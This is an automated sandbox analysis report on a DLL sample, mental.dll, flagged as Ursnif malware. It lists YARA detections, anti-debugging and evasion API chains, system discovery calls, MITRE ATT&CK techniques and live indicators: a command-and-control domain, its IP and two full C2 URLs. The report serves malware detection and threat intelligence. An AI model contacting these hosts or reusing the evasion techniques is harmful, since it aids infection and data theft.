Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Windows\SysWOW64\rundll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\loaddll32.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D47E4C3 IsDebuggerPresent,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D4868A8 LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F7C LoadLibraryA,GetProcAddress,

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA7ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA71C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6D4CA323 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA7ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA71C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6D4CA323 push dword ptr fs:[00000030h]

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D47EA62 GetProcessHeap,

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\mental.dll',#1

Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.924056503.00000000017D0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.924491282.0000000002C70000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE4454 cpuid

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe	Code function: __crtGetLocaleInfoA_stat,
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,__invoke_watson,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __crtGetLocaleInfoA_stat,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00DE4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6D471F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.894024804.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894006567.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.894036299.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858380580.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858493961.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.925438846.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893911104.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893958439.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858602685.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858556678.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893875579.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858220595.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.924921046.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858579008.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858117816.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.858445363.0000000005018000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893935823.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.893978637.0000000003D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6644, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6608, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API3	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
mental.dll	4%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.de0000.0.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
5.2.rundll32.exe.53e0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
3.2.rundll32.exe.790000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
gtr.antoinfer.com	8%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	100%	Avira URL Cloud	malware
http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gtr.antoinfer.com	185.228.233.17	true	true	8%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://gtr.antoinfer.com/mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z	true	Avira URL Cloud: malware	unknown
http://gtr.antoinfer.com/02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M	true	Avira URL Cloud: malware	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.228.233.17	gtr.antoinfer.com	Russian Federation		64439	ITOS-ASRU	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	455445
Start date:	28.07.2021
Start time:	13:45:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	mental.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.troj.winDLL@16/8@2/2
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 21.6% (good quality ratio 20.6%) Quality average: 79.7% Quality standard deviation: 28.5%
HCA Information:	Successful, ratio: 77% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 168.61.161.212, 13.88.21.125, 104.43.193.48, 93.184.221.240, 20.190.160.5, 20.190.160.135, 20.190.160.131, 20.190.160.133, 20.190.160.9, 20.190.160.1, 20.190.160.70, 20.190.160.68, 20.82.209.183, 2.18.105.186, 20.82.210.154, 23.10.249.26, 23.10.249.43, 152.199.19.161, 20.54.110.249 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, wu.azureedge.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, ams1.next.a.prd.aadg.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target rundll32.exe, PID 6632 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:47:16	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gtr.antoinfer.com	lj3H69Z3Io.dll	Get hash	malicious	Browse	167.172.38.18
	SecuriteInfo.com.Trojan.GenericKD.46602191.18619.dll	Get hash	malicious	Browse	165.232.183.49
	documentation_39236.xlsb	Get hash	malicious	Browse	165.232.183.49
	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ITOS-ASRU	1n0JwffkPt.exe	Get hash	malicious	Browse	185.228.233.5
	niaSOf2RtX.exe	Get hash	malicious	Browse	193.187.173.42
	ao9sQznMcA.exe	Get hash	malicious	Browse	193.187.175.114
	k87DGeHNZD.exe	Get hash	malicious	Browse	193.187.175.114
	iiLllZALpo.exe	Get hash	malicious	Browse	193.187.175.114
	E6o11ym5Sz.exe	Get hash	malicious	Browse	193.187.175.114
	Oo0Djz1juc.exe	Get hash	malicious	Browse	193.187.175.114
	JeqzgYmPWu.exe	Get hash	malicious	Browse	193.187.175.114
	HBkYcWWHmy.exe	Get hash	malicious	Browse	185.159.129.78
	report.11.20.doc	Get hash	malicious	Browse	193.187.175.31
	intelligence_11.20.doc	Get hash	malicious	Browse	193.187.175.31
	details-11.20.doc	Get hash	malicious	Browse	193.187.175.31
	deed contract_11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	direct 11.20.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	question 11.04.2020.doc	Get hash	malicious	Browse	193.187.175.31
	figures_010.14.2020.doc	Get hash	malicious	Browse	193.187.173.48

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9D47ABEC-EF99-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	49752
Entropy (8bit):	1.9569503448438568
Encrypted:	false
